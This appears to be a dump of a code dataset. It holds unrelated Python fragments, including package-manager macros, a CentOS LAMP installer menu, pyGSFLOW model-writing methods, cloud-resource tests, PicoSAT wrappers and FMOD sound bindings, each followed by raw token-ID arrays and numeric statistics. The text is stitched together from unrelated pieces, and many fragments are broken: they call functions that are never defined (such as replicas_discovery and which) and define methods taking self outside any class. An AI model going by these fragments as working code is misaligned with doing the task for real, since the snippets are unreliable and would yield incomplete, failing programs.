125
# All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import collections import mock from oslo_versionedobjects import fixture as object_fixture from mogan.notifications import base as notification_base from mogan.notifications.objects import base as notification from mogan.objects import base from mogan.objects import fields from mogan.objects import server as server_obj from mogan.tests import base as test_base from mogan.tests.unit.db import utils as db_utils notification_object_data = { 'ServerPayload': '1.0-30fefa8478f1b9b35c66868377fb6dfd', 'ServerAddressesPayload': '1.0-69caf4c36f36756bb1f6970d093ee1f6', 'ServerActionPayload': '1.0-8dc4429afa34d86ab92c9387e3ccd0c3', 'ServerActionNotification': '1.0-20087e599436bd9db62ae1fb5e2dfef2', 'ExceptionPayload': '1.0-7c31986d8d78bed910c324965c431e18', 'EventType': '1.0-589894aac7c98fb640eca394f67ad621', 'NotificationPublisher': '1.0-4b0b0d662b21eeed0b23617f3f11794b' }
[ 2, 1439, 6923, 33876, 13, 198, 2, 198, 2, 220, 220, 220, 49962, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 357, 1169, 366, 34156, 15341, 345, 743, 198, 2, 220, 220, 220, 407, 779, 428, 2393, 2845, 287, 11846, 351, 262, 13789,...
2.792593
540
from plash.eval import eval, register_macro, shell_escape_args eval([[ 'defpm', 'apt', 'apt-get update', 'apt-get install -y {}', ], [ 'defpm', 'add-apt-repository', 'apt-get install software-properties-common', 'run add-apt-repository -y {}', ], [ 'defpm', 'apk', 'apk update', 'apk add {}', ], [ 'defpm', 'yum', 'yum install -y {}', ], [ 'defpm', 'dnf', 'dnf install -y {}', ], [ 'defpm', 'pip', 'pip install {}', ], [ 'defpm', 'pip3', 'pip3 install {}', ], [ 'defpm', 'npm', 'npm install -g {}', ], [ 'defpm', 'pacman', 'pacman -Sy --noconfirm {}', ], [ 'defpm', 'emerge', 'emerge {}', ]])
[ 6738, 458, 1077, 13, 18206, 1330, 5418, 11, 7881, 62, 20285, 305, 11, 7582, 62, 41915, 62, 22046, 628, 198, 198, 18206, 26933, 58, 198, 220, 220, 220, 705, 4299, 4426, 3256, 198, 220, 220, 220, 705, 2373, 3256, 198, 220, 220, 220, ...
1.93617
376
from typing import Optional, List from pydantic import BaseModel, EmailStr from . import result
[ 6738, 19720, 1330, 32233, 11, 7343, 198, 198, 6738, 279, 5173, 5109, 1330, 7308, 17633, 11, 9570, 13290, 198, 198, 6738, 764, 1330, 1255, 628, 198 ]
3.846154
26
from rankedchoicevoting import Poll candidatesA = {"Bob": 0, "Sue": 0, "Bill": 0} #votes in array sorted by first choice to last choice votersA = { "a": ['Bob', 'Bill', 'Sue'], "b": ['Sue', 'Bob', 'Bill'], "c": ['Bill', 'Sue', 'Bob'], "d": ['Bob', 'Bill', 'Sue'], "f": ['Sue', 'Bob', 'Bill'] } election = Poll(candidatesA,votersA) election.addCandidate("Joe", 0) election.addVoter("g",['Joe','Bob']) print("Winner: " + election.getPollResults())
[ 6738, 10307, 25541, 85, 10720, 1330, 12868, 628, 198, 46188, 37051, 32, 796, 19779, 18861, 1298, 657, 11, 366, 50, 518, 1298, 657, 11, 366, 17798, 1298, 657, 92, 198, 198, 2, 29307, 287, 7177, 23243, 416, 717, 3572, 284, 938, 3572, ...
2.435233
193
#!/usr/bin/env python # -*- coding: utf-8 -*- # -*- author: Alex -*- from Centos6_Bit64 import * from SystemUtils import * # Checking version of OS should happened before menu appears # Check version of CentOS SystemUtils.check_centos_version() # Clear screen before to show menu os.system('clear') answer = True while answer: print (""" LAMP Deploy Script V: 0.1 for CentOS 6.5/6.6 64Bit: --------------------------------------------------- 1. Check version of your CentOS 2. Check Internet connection 3. Show me my local IP address 4. Open port 80 to Web 5. Show me my localhost name ------- LAMP for CentOS 6.x ----------- 6. Install EPEL & IUS repository 7. Install Web Server - Apache 8. Install Database - MySQL 9. Install Language - PHP 10. Install LAMP in "One Click" - CentOS 6.x 11. Exit/Quit """) answer = input("Please make your choice: ") if answer == 1: os.system('clear') print ('\nChecking version of the system: ') SystemUtils.check_centos_version() elif answer == 2: os.system('clear') print ('\nChecking if you connected to the Internet') SystemUtils.check_internet_connection() elif answer == 3: os.system('clear') print ('\nYour local IP address is: ' + SystemUtils.check_local_ip()) elif answer == 4: os.system('clear') print('\nChecking firewall') Centos6Deploy.iptables_port() elif answer == 5: print "Checking local hostname..." SystemUtils.check_host_name() elif answer == 6: print ('\nInstalling EPEL and IUS repository to the system...') Centos6Deploy.add_repository() elif answer == 7: print ('\nInstalling Web Server Apache...') Centos6Deploy.install_apache() elif answer == 8: print ('\nInstalling database MySQL...') Centos6Deploy.install_mysql() elif answer == 9: print('\nInstalling PHP...') Centos6Deploy.install_php() elif answer == 10: print ('Install LAMP in "One Click" - CentOS 6.x') Centos6Deploy.iptables_port() Centos6Deploy.add_repository() Centos6Deploy.install_mysql() Centos6Deploy.install_php() elif answer == 11: print("\nGoodbye...\n") answer = None else: print ('\nNot valid Choice, Try Again') answer = True
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 2, 532, 9, 12, 1772, 25, 4422, 532, 9, 12, 198, 198, 6738, 1979, 418, 21, 62, 13128, 2414, 1330, 1635, 198, 6738, ...
2.520291
961
import asyncio import os import time from dataclasses import dataclass import requests_unixsocket from aiohttp import ClientSession, web replicas = replicas_discovery() self_id = next(filter(lambda x: x.is_self, replicas)).replica_id print(replicas, flush=True) app = web.Application() app.add_routes([web.get('/', index), web.get('/hello', hello)]) web.run_app(app, host='0.0.0.0', port=8080)
[ 11748, 30351, 952, 198, 11748, 28686, 198, 11748, 640, 198, 6738, 4818, 330, 28958, 1330, 4818, 330, 31172, 198, 198, 11748, 7007, 62, 403, 844, 44971, 198, 6738, 257, 952, 4023, 1330, 20985, 36044, 11, 3992, 628, 628, 198, 35666, 44645...
2.592593
162
from __future__ import absolute_import from setuptools import setup from txjsonrpc import meta from txjsonrpc.util import dist setup( name=meta.display_name, version=meta.version, description=meta.description, author=meta.author, author_email=meta.author_email, url=meta.url, license=meta.license, packages=dist.findPackages(meta.library_name), long_description=dist.catReST( "docs/PRELUDE.txt", "README", "docs/DEPENDENCIES.txt", "docs/INSTALL.txt", "docs/USAGE.txt", "TODO", "docs/HISTORY.txt", stop_on_errors=True, out=True), classifiers=[ "Development Status :: 4 - Beta", "Intended Audience :: Developers", "Programming Language :: Python", ], )
[ 6738, 11593, 37443, 834, 1330, 4112, 62, 11748, 198, 6738, 900, 37623, 10141, 1330, 9058, 198, 198, 6738, 27765, 17752, 81, 14751, 1330, 13634, 198, 6738, 27765, 17752, 81, 14751, 13, 22602, 1330, 1233, 628, 198, 40406, 7, 198, 220, 220...
2.278409
352
# -*- coding: utf-8 -*- import os from .control import ControlFile from .prms import PrmsModel from .utils import gsflow_io, GsConstant from .prms import Helper from .modflow import Modflow from .modsim import Modsim import flopy import subprocess as sp import platform import warnings warnings.simplefilter("always", PendingDeprecationWarning) warnings.simplefilter("always", UserWarning) def write_input(self, basename=None, workspace=None, write_only=None): """ Write input files for gsflow. Four cases are possible: (1) if basename and workspace are None,then the exisiting files will be overwritten (2) if basename is specified, only file names will be changes (3) if only workspace is specified, only folder will be changed (4) when both basename and workspace are specifed both files are changed Parameters ---------- basename : str project basename workspace : str model output directory write_only: a list ['control', 'parameters', 'prms_data', 'mf', 'modsim'] Examples -------- >>> gsf = gsflow.GsflowModel.load_from_file('gsflow.control') >>> gsf.write_input(basename="new", workspace="../new_model") """ print("Writing the project files .....") if workspace is not None: workspace = os.path.abspath(workspace) if (basename, workspace) == (None, None): print("Warning: input files will be overwritten....") self._write_all(write_only) # only change the directory elif basename is None and workspace is not None: if not (os.path.isdir(workspace)): os.mkdir(workspace) fnn = os.path.basename(self.control.control_file) self.control.model_dir = workspace self.control.control_file = os.path.join(workspace, fnn) self.control_file = os.path.join(workspace, fnn) if self.prms is not None: self.prms.control_file = self.control_file # change parameters new_param_file_list = [] for par_record in self.prms.parameters.parameters_list: curr_file = os.path.basename(par_record.file_name) curr_file = os.path.join(workspace, curr_file) par_record.file_name = curr_file if not (curr_file in new_param_file_list): new_param_file_list.append(curr_file) self.control.set_values("param_file", new_param_file_list) # change datafile curr_file = os.path.relpath( os.path.join(workspace, self.prms.data.name), self.control.model_dir, ) self.prms.data.model_dir = workspace self.control.set_values("data_file", [curr_file]) # change mf if self.mf is not None: self.mf.change_model_ws(workspace, reset_external=True) mfnm = self.mf.name + ".nam" self.control.set_values("modflow_name", [mfnm]) # update file names in control object self._update_control_fnames(workspace, basename) # write if self.prms is not None: self.prms.control = self.control self._write_all(write_only) # only change the basename elif basename is not None and workspace is None: cnt_file = basename + "_cont.control" ws_ = os.path.dirname(self.control.control_file) self.control.control_file = os.path.join(ws_, cnt_file) self.control_file = os.path.join(ws_, cnt_file) self.prms.control_file = self.control_file # change parameters flist = self.prms.parameters.parameter_files new_param_file_list = [] for ifile, par_record in enumerate( self.prms.parameters.parameters_list ): file_index = flist.index(par_record.file_name) par_file = basename + "_par_{}.params".format(file_index) curr_dir = self.control.model_dir curr_file = os.path.join(curr_dir, par_file) par_record.file_name = curr_file if not (curr_file in new_param_file_list): new_param_file_list.append(curr_file) self.control.set_values("param_file", new_param_file_list) # change datafile dfile = basename + "_dat.data" curr_file = os.path.relpath( os.path.join(self.prms.data.model_dir, dfile), self.control.model_dir, ) self.prms.data.name = dfile self.control.set_values("data_file", [curr_file]) # change mf if self.mf is not None: curr_dir = self.mf.model_ws self.mf._set_name(basename) self._update_mf_basename(basename) mfnm = self.mf.name + ".nam" self.control.set_values("modflow_name", [mfnm]) # update file names in control object self._update_control_fnames(workspace, basename) self.prms.control = self.control self._write_all(write_only) # change both directory & basename elif basename is not None and workspace is not None: if not (os.path.isdir(workspace)): os.mkdir(workspace) cnt_file = basename + "_cont.control" self.control.model_dir = workspace self.control.control_file = os.path.join(workspace, cnt_file) self.prms.control_file = self.control.control_file self.control_file = self.control.control_file # change parameters # get param files list flist = self.prms.parameters.parameter_files new_param_file_list = [] for ifile, par_record in enumerate( self.prms.parameters.parameters_list ): file_index = flist.index(par_record.file_name) par_file = basename + "_par_{}.params".format(file_index) curr_file = os.path.join(workspace, par_file) par_record.file_name = curr_file if not (curr_file in new_param_file_list): new_param_file_list.append(curr_file) self.control.set_values("param_file", new_param_file_list) # change datafile dfile = basename + "_dat.data" curr_file = os.path.relpath( os.path.join(workspace, dfile), self.control.model_dir ) self.prms.data.model_dir = workspace self.prms.data.name = dfile self.control.set_values("data_file", [curr_file]) # flatten mf if self.mf is not None: self.mf.change_model_ws(workspace) self.mf._set_name(os.path.join(workspace, basename)) self._update_mf_basename(basename) mfnm = basename + ".nam" self.control.set_values( "modflow_name", [ os.path.relpath( os.path.join(workspace, mfnm), self.control.model_dir ) ], ) # update file names in control object self._update_control_fnames(workspace, basename) self.prms.control = self.control self._write_all(write_only) else: raise NotImplementedError() def _update_control_fnames(self, workspace, basename): """ Method to update control file names and paths Parameters ---------- workspace : str model output directory basename : str project basename """ if workspace is not None and basename is None: self.control.model_dir = workspace for rec_name in GsConstant.GSFLOW_FILES: if rec_name in self.control.record_names: file_values = self.control.get_values(rec_name) file_value = [] for fil in file_values: va = os.path.join(workspace, os.path.basename(fil)) va = os.path.relpath(va, self.control.model_dir) file_value.append(va) self.control.set_values(rec_name, file_value) else: for rec_name in GsConstant.GSFLOW_FILES: if rec_name in self.control.record_names: if rec_name in ("modflow_name",): continue elif rec_name in ( "modflow_name", "param_file", "data_file", ): file_values = self.control.get_values(rec_name) file_value = [] for fil in file_values: ws, filvalue = os.path.split(fil) if not ws: pass else: filvalue = os.path.relpath( fil, self.control.model_dir ) file_value.append(filvalue) self.control.set_values(rec_name, file_value) else: file_values = self.control.get_values(rec_name) file_value = [] for fil in file_values: if workspace is None: workspace = self.control.model_dir vvfile = rec_name.split("_") del vvfile[-1] vvfile = "_".join(vvfile) if "." in fil: ext = fil.split(".")[-1] else: ext = "dat" vvfile = basename + "_" + vvfile + "." + ext filvalue = os.path.join(workspace, vvfile) filvalue = os.path.relpath( filvalue, self.control.model_dir ) file_value.append(filvalue) self.control.set_values(rec_name, file_value) def _update_mf_basename(self, basename): """ Convience method to update modflow Basename Parameters ---------- basename : str basename of the Modflow object """ out_files_list = [] for ix, out_file in enumerate(self.mf.output_fnames): if out_file.count(".") > 1: ext = out_file.split(".") del ext[0] ext = ".".join(ext) else: ext = out_file.split(".")[-1] new_outfn = "{}.{}".format(basename, ext) out_files_list.append(new_outfn) self.mf.output_fnames = out_files_list def _write_all(self, write_only): """ Method to write input files Parameters ---------- write_only : list list of files to write accepts, control, parameters, prms_data, mf, and modsim """ write_only_options = ( "control", "parameters", "prms_data", "mf", "modsim", ) if write_only is not None: if not isinstance(write_only, list): raise ValueError("write_only agrgument must be a list") # make write options case insensitive write_only = [i.lower() for i in write_only] for write_option in write_only: if not (write_option in write_only_options): raise ValueError( "The option '{}' is not recognized...".format( write_option ) ) else: write_only = () # write control if len(write_only) == 0 or "control" in write_only: print("Writing Control file ...") self.control.write() if self.prms is not None: # self write parameters if len(write_only) == 0 or "parameters" in write_only: print("Writing Parameters files ...") self.prms.parameters.write() # write data if len(write_only) == 0 or "prms_data" in write_only: print("Writing Data file ...") self.prms.data.write() # write mf if self.mf is not None: if len(write_only) == 0 or "mf" in write_only: print("Writing Modflow files...") self.mf.write_input() if self.modsim is not None: if len(write_only) == 0 or "modsim" in write_only: print("Writing MODSIM shapefile") self.modsim.write_modsim_shapefile() def run_model(self, model_ws=".", forgive=False, gsflow_exe=None): """ Method to run a gsflow model Parameters ---------- model_ws : str parameter to specify the model directory forgive : bool forgives convergence issues gslfow_exe : str or None path to gsflow_exe, if gsflow_exe is None it will use the previously defined gsflow_exe variable or the default gsflow.exe. Returns ------- None or (success, buffer) Examples -------- >>> gsf = gsflow.GsflowModel.load_from_file("gsflow.control") >>> gsf.run_model() """ fn = self.control_file if gsflow_exe is None: gsflow_exe = self.gsflow_exe if not os.path.isfile(gsflow_exe): print( "Warning : The executable of the model could not be found. " "Use the gsflow_exe= parameter to define its path... " ) return None normal_msg = [ "normal termination", ] # , "simulation successful"] if forgive: normal_msg.append("failed to meet solver convergence criteria") return self.__run( exe_name=gsflow_exe, namefile=fn, normal_msg=normal_msg, model_ws=model_ws, ) def __run( self, exe_name, namefile, model_ws=".", silent=False, report=False, normal_msg="normal termination", cargs=None, ): """ This function will run the model using subprocess.Popen. Parameters ---------- exe_name : str Executable name (with path, if necessary) to run. namefile : str Namefile of model to run. The namefile must be the filename of the namefile without the path. model_ws : str Path to the location of the namefile. (default is the current working directory - './') silent : boolean Echo run information to screen (default is True). report : boolean, optional Save stdout lines to a list (buff) which is returned by the method . (default is False). normal_msg : str Normal termination message used to determine if the run terminated normally. (default is 'normal termination') cargs : str or list of strings additional command line arguments to pass to the executable. Default is None Returns ------- (success, buff) success : boolean buff : list of lines of stdout """ success = False buff = [] # convert normal_msg to lower case for comparison if isinstance(normal_msg, str): normal_msg = [normal_msg.lower()] elif isinstance(normal_msg, list): for idx, s in enumerate(normal_msg): normal_msg[idx] = s.lower() # Check to make sure that program and namefile exist exe = which(exe_name) if exe is None: if platform.system() in "Windows": if not exe_name.lower().endswith(".exe"): exe = which(exe_name + ".exe") if exe is None: s = "The program {} does not exist or is not executable.".format( exe_name ) raise Exception(s) else: if not silent: s = "pyGSFLOW is using the following executable to run the model: {}".format( exe ) print(s) exe = os.path.normpath(os.path.join(os.getcwd(), exe)) if not os.path.isfile(os.path.join(model_ws, namefile)): s = "The namefile for this model does not exists: {}".format( namefile ) raise Exception(s) # simple little function for the thread to target # def q_output(output, q): # for line in iter(output.readline, b''): # q.put(line) # time.sleep(1) # output.close() # create a list of arguments to pass to Popen argv = [exe, namefile] # add additional arguments to Popen arguments if cargs is not None: if isinstance(cargs, str): cargs = [cargs] for t in cargs: argv.append(t) # run the model with Popen # if platform.system().lower() == "windows": # self._generate_batch_file() # cargv = self.__bat_file # else: # pass model_ws = os.path.dirname(self.control_file) proc = sp.Popen(argv, stdout=sp.PIPE, stderr=sp.STDOUT, cwd=model_ws) while True: line = proc.stdout.readline() c = line.decode("utf-8") if c != "": for msg in normal_msg: if msg in c.lower(): success = True break c = c.rstrip("\r\n") if not silent: print("{}".format(c)) if report: buff.append(c) else: break return success, buff
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 11748, 28686, 198, 6738, 764, 13716, 1330, 6779, 8979, 198, 6738, 764, 1050, 907, 1330, 1736, 907, 17633, 198, 6738, 764, 26791, 1330, 308, 82, 11125, 62, 952, 11, 402, ...
1.897601
9,922
import logging import pytest from moto import mock_ec2, mock_iam, mock_sts from cloudwanderer.cloud_wanderer_resource import CloudWandererResource from cloudwanderer.storage_connectors import MemoryStorageConnector from cloudwanderer.urn import URN from tests.pytest_helpers import create_ec2_instances logger = logging.getLogger(__name__) def test_delete_subresources_from_resource(memory_connector, iam_role, iam_role_policies): """If we are deleting a parent resource we should delete all its subresources.""" memory_connector.write_resource(resource=iam_role) memory_connector.write_resource(resource=iam_role_policies[0]) memory_connector.write_resource(resource=iam_role_policies[1]) role_before_delete = memory_connector.read_resource(urn=iam_role.urn) role_policy_1_before_delete = memory_connector.read_resource(urn=iam_role_policies[0].urn) role_policy_2_before_delete = memory_connector.read_resource(urn=iam_role_policies[1].urn) # Delete the parent and ensure the subresources are also deleted memory_connector.delete_resource(urn=iam_role.urn) role_after_delete = memory_connector.read_resource(urn=iam_role.urn) role_policy_1_after_delete = memory_connector.read_resource(urn=iam_role_policies[0].urn) role_policy_2_after_delete = memory_connector.read_resource(urn=iam_role_policies[1].urn) assert role_before_delete.urn == iam_role.urn assert role_policy_1_before_delete.urn == iam_role_policies[0].urn assert role_policy_2_before_delete.urn == iam_role_policies[1].urn assert role_after_delete is None assert role_policy_1_after_delete is None assert role_policy_2_after_delete is None
[ 11748, 18931, 198, 198, 11748, 12972, 9288, 198, 6738, 285, 2069, 1330, 15290, 62, 721, 17, 11, 15290, 62, 1789, 11, 15290, 62, 6448, 198, 198, 6738, 6279, 86, 392, 11882, 13, 17721, 62, 86, 392, 11882, 62, 31092, 1330, 10130, 54, 3...
2.861252
591
"""Python wrapper around the _clibs PicoSAT extension.""" import os from tt.errors.arguments import ( InvalidArgumentTypeError, InvalidArgumentValueError) if os.environ.get('READTHEDOCS') != 'True': from tt._clibs import picosat as _c_picosat VERSION = _c_picosat.VERSION def sat_one(clauses, assumptions=None): """Find a solution that satisfies the specified clauses and assumptions. This provides a light Python wrapper around the same method in the PicoSAT C-extension. While completely tested and usable, this method is probably not as useful as the interface provided through the :func:`sat_one <tt.expressions.bexpr.BooleanExpression.sat_one>` method in the :class:`BooleanExpression <tt.expressions.bexpr.BooleanExpression>` class. :param clauses: CNF (AND of ORs) clauses; positive integers represent non-negated terms and negative integers represent negated terms. :type clauses: List[List[:class:`int <python:int>`]] :param assumptions: Assumed terms; same negation logic from ``clauses`` applies here. Note that assumptions *cannot* be an empty list; leave it as ``None`` if there are no assumptions to include. :type assumptions: List[:class:`int <python:int>`] :returns: If solution is found, a list of ints representing the terms of the solution; otherwise, if no solution found, ``None``. :rtype: List[:class:`int <python:int>`] or ``None`` :raises InvalidArgumentTypeError: If ``clauses`` is not a list of lists of ints or ``assumptions`` is not a list of ints. :raises InvalidArgumentValueError: If any literal ints are equal to zero. Let's look at a simple example with no satisfiable solution:: >>> from tt import picosat >>> picosat.sat_one([[1], [-1]]) is None True Here's an example where a solution exists:: >>> picosat.sat_one([[1, 2, 3], [-2, -3], [1, -2], [2, -3], [-2]]) [1, -2, -3] Finally, here's an example using assumptions:: >>> picosat.sat_one([[1, 2, 3], [2, 3]], assumptions=[-1, -3]) [-1, 2, -3] """ try: return _c_picosat.sat_one(clauses, assumptions=assumptions) except TypeError as e: raise InvalidArgumentTypeError(str(e)) except ValueError as e: raise InvalidArgumentValueError(str(e)) def sat_all(clauses, assumptions=None): """Find all solutions that satisfy the specified clauses and assumptions. This provides a light Python wrapper around the same method in the PicoSAT C-extension. While completely tested and usable, this method is probably not as useful as the interface provided through the :func:`sat_all <tt.expressions.bexpr.BooleanExpression.sat_all>` method in the :class:`BooleanExpression <tt.expressions.bexpr.BooleanExpression>` class. :param clauses: CNF (AND of ORs) clauses; positive integers represent non-negated terms and negative integers represent negated terms. :type clauses: List[List[:class:`int <python:int>`]] :param assumptions: Assumed terms; same negation logic from ``clauses`` applies here. Note that assumptions *cannot* be an empty list; leave it as ``None`` if there are no assumptions to include. :type assumptions: List[:class:`int <python:int>`] :returns: An iterator of solutions; if no satisfiable solutions exist, the iterator will be empty. :rtype: Iterator[List[:class:`int <python:int>`]] :raises InvalidArgumentTypeError: If ``clauses`` is not a list of lists of ints or ``assumptions`` is not a list of ints. :raises InvalidArgumentValueError: If any literal ints are equal to zero. Here's an example showing the basic usage:: >>> from tt import picosat >>> for solution in picosat.sat_all([[1], [2, 3, 4], [2, 3]]): ... print(solution) ... [1, 2, 3, 4] [1, 2, 3, -4] [1, 2, -3, 4] [1, 2, -3, -4] [1, -2, 3, 4] [1, -2, 3, -4] We can cut down on some of the above solutions by including an assumption:: >>> for solution in picosat.sat_all([[1], [2, 3, 4], [2, 3]], ... assumptions=[-3]): ... print(solution) ... [1, 2, -3, 4] [1, 2, -3, -4] """ try: return _c_picosat.sat_all(clauses, assumptions=assumptions) except TypeError as e: raise InvalidArgumentTypeError(str(e)) except ValueError as e: raise InvalidArgumentValueError(str(e))
[ 37811, 37906, 29908, 1088, 262, 4808, 565, 571, 82, 350, 3713, 50, 1404, 7552, 526, 15931, 198, 198, 11748, 28686, 198, 198, 6738, 256, 83, 13, 48277, 13, 853, 2886, 1330, 357, 198, 220, 220, 220, 17665, 28100, 1713, 6030, 12331, 11, ...
2.598078
1,769
import os import re import shutil import unittest from pathlib import Path from dianna.visualization.text import highlight_text def _split_text_into_words(text): # regex taken from # https://stackoverflow.com/questions/12683201/python-re-split-to-split-by-spaces-commas-and-periods-but-not-in-cases-like # explanation: split by \s (whitespace), and only split by commas and # periods if they are not followed (?!\d) or preceded (?<!\d) by a digit. regex = r'\s|(?<!\d)[,.](?!\d)' return re.split(regex, text)
[ 11748, 28686, 198, 11748, 302, 198, 11748, 4423, 346, 198, 11748, 555, 715, 395, 198, 6738, 3108, 8019, 1330, 10644, 198, 6738, 288, 666, 2616, 13, 41464, 1634, 13, 5239, 1330, 7238, 62, 5239, 628, 628, 198, 198, 4299, 4808, 35312, 62...
2.663366
202
import os import sys import builtins import versioneer if sys.version_info[:2] < (3, 7): raise RuntimeError("Python version >= 3.7 required.") builtins.__RBC_SETUP__ = True if os.path.exists('MANIFEST'): os.remove('MANIFEST') CONDA_BUILD = int(os.environ.get('CONDA_BUILD', '0')) CONDA_ENV = os.environ.get('CONDA_PREFIX', '') != '' from setuptools import setup, find_packages # noqa: E402 DESCRIPTION = "RBC - Remote Backend Compiler Project" LONG_DESCRIPTION = """ The aim of the Remote Backend Compiler project is to distribute the tasks of a program JIT compilation process to separate computer systems using the client-server model. The frontend of the compiler runs on the client computer and the backend runs on the server computer. The compiler frontend will send the program code to compiler backend in IR form where it will be compiled to machine code. """ if __name__ == '__main__': setup_package() del builtins.__RBC_SETUP__
[ 11748, 28686, 198, 11748, 25064, 198, 11748, 3170, 1040, 198, 11748, 2196, 28153, 198, 198, 361, 25064, 13, 9641, 62, 10951, 58, 25, 17, 60, 1279, 357, 18, 11, 767, 2599, 198, 220, 220, 220, 5298, 43160, 12331, 7203, 37906, 2196, 1818...
3.126623
308
""" Schedule adjustments are functions that accept a `datetime` and modify it in some way. Adjustments have the signature `Callable[[datetime], datetime]`. """ from datetime import datetime, timedelta from typing import Callable import pendulum import prefect.schedules.filters def add(interval: timedelta) -> Callable[[datetime], datetime]: """ Adjustment that adds a specified interval to the date. Args: - interval (timedelta): the amount of time to add Returns: - Callable[[datetime], bool]: the adjustment function """ return _adjustment_fn def next_weekday(dt: datetime) -> datetime: """ Adjustment that advances a date to the next weekday. If the date is already a weekday, it is returned unadjusted. Args: - dt (datetime): the datetime to adjust Returns: - datetime: the adjusted datetime """ pdt = pendulum.instance(dt) while not prefect.schedules.filters.is_weekday(pdt): pdt = pdt.add(days=1) return pdt
[ 37811, 198, 27054, 5950, 16895, 389, 5499, 326, 2453, 257, 4600, 19608, 8079, 63, 290, 13096, 340, 287, 617, 835, 13, 198, 198, 39668, 902, 423, 262, 9877, 4600, 14134, 540, 30109, 19608, 8079, 4357, 4818, 8079, 60, 44646, 198, 37811, ...
2.860724
359
from .fmodobject import * from .fmodobject import _dll from .structures import TAG, VECTOR from .globalvars import get_class class Sound(FmodObject): def get_length(self, ltype): len = c_uint() ckresult(_dll.FMOD_Sound_GetLength(self._ptr, byref(len), ltype)) return len.value def get_music_channel_volume(self, channel): v = c_float() ckresult(_dll.FMOD_Sound_GetMusicChannelVolume(self._ptr, channel, byref(v))) return v.value def set_music_channel_volume(self, id, vol): ckresult(_dll.FMOD_Sound_SetMusicChannelVolume(self._ptr, id, c_float(vol))) def get_subsound(self, index): sh_ptr = c_void_p() ckresult(_dll.FMOD_Sound_GetSubSound(self._ptr, index, byref(sh_ptr))) return Sound(sh_ptr) def get_sync_point(self, index): sp = c_int() ckresult(_dll.FMOD_Sound_GetSyncPoint(self._ptr, index, byref(sp))) return sp.value def get_sync_point_info(self, point): name = c_char_p() offset = c_uint() offsettype = c_int() ckresult(_dll.FMOD_Sound_GetSyncPointInfo(self._ptr, point, byref(name), 256, byref(offset), byref(offsettype))) return so(name=name.value, offset=offset.value, offset_type=offsettype.value) def lock(self, offset, length): ptr1 = c_void_p() len1 = c_uint() ptr2 = c_void_p() len2 = c_uint() ckresult(_dll.FMOD_Sound_Lock(self._ptr, offset, length, byref(ptr1), byref(ptr2), byref(len1), byref(len2))) return ((ptr1, len1), (ptr2, len2)) def release(self): ckresult(_dll.FMOD_Sound_Release(self._ptr)) def set_subsound(self, index, snd): check_type(snd, Sound) ckresult(_dll.FMOD_Sound_SetSubSound(self._ptr, index, snd._ptr)) def set_subsound_sentence(self, sounds): a = c_int * len(sounds) ptrs = [o._ptr for o in sounds] ai = a(*ptrs) ckresult(_dll.FMOD_Sound_SetSubSoundSentence(self._ptr, ai, len(ai))) def unlock(self, i1, i2): """I1 and I2 are tuples of form (ptr, len).""" ckresult(_dll.FMOD_Sound_Unlock(self._ptr, i1[0], i2[0], i1[1], i2[1])) def read_data(self, length): """Read a fragment of the sound's decoded data. :param length: The requested length. :returns: The data and the actual length. :rtype: Tuple of the form (data, actual).""" buf = create_string_buffer(length) actual = c_uint() self._call_fmod("FMOD_Sound_ReadData", buf, length, byref(actual)) return buf.value, actual.value def seek_data(self, offset): """Seeks for data reading purposes. :param offset: The offset to seek to in PCM samples. :type offset: Int or long, but must be in range of an unsigned long, not python's arbitrary long.""" self._call_fmod("FMOD_Sound_SeekData", offset)
[ 6738, 764, 69, 4666, 15252, 1330, 1635, 198, 6738, 764, 69, 4666, 15252, 1330, 4808, 12736, 198, 6738, 764, 7249, 942, 1330, 37801, 11, 569, 9782, 1581, 198, 6738, 764, 20541, 85, 945, 1330, 651, 62, 4871, 628, 198, 198, 4871, 9506, ...
2.269261
1,285
from collections.abc import Iterable import warnings from hdmf.utils import docval, popargs, call_docval_func, get_docval from . import register_class, CORE_NAMESPACE from .core import NWBDataInterface, NWBData
[ 6738, 17268, 13, 39305, 1330, 40806, 540, 198, 11748, 14601, 198, 198, 6738, 289, 36020, 69, 13, 26791, 1330, 2205, 2100, 11, 1461, 22046, 11, 869, 62, 15390, 2100, 62, 20786, 11, 651, 62, 15390, 2100, 198, 198, 6738, 764, 1330, 7881,...
3.205882
68
""" Implement a class function for user to put in a zip-code and search relevant information about business entities in that zip-code area. """ from flask.ext.wtf import Form from wtforms import StringField, BooleanField from wtforms.validators import DataRequired
[ 37811, 198, 220, 220, 220, 48282, 257, 1398, 2163, 329, 2836, 284, 1234, 287, 257, 19974, 12, 8189, 290, 198, 220, 220, 220, 2989, 5981, 1321, 546, 1597, 12066, 287, 326, 19974, 12, 8189, 1989, 13, 198, 37811, 198, 198, 6738, 42903, ...
3.819444
72
''' 1. Write a Python program to access a specific item in a singly linked list using index value. 2. Write a Python program to set a new value of an item in a singly linked list using index value. 3. Write a Python program to delete the first item from a singly linked list. '''
[ 7061, 6, 198, 16, 13, 19430, 257, 11361, 1430, 284, 1895, 257, 2176, 2378, 287, 257, 1702, 306, 6692, 1351, 1262, 6376, 1988, 13, 198, 198, 17, 13, 19430, 257, 11361, 1430, 284, 900, 257, 649, 1988, 286, 281, 2378, 287, 257, 1702, ...
3.773333
75
__version__ = "0.3.4dev"
[ 834, 9641, 834, 796, 366, 15, 13, 18, 13, 19, 7959, 1, 198 ]
1.923077
13
import unittest from premailer.premailer import capitalize_float_margin
[ 11748, 555, 715, 395, 198, 198, 6738, 4199, 603, 263, 13, 31605, 603, 263, 1330, 35160, 62, 22468, 62, 36153, 628 ]
3.52381
21
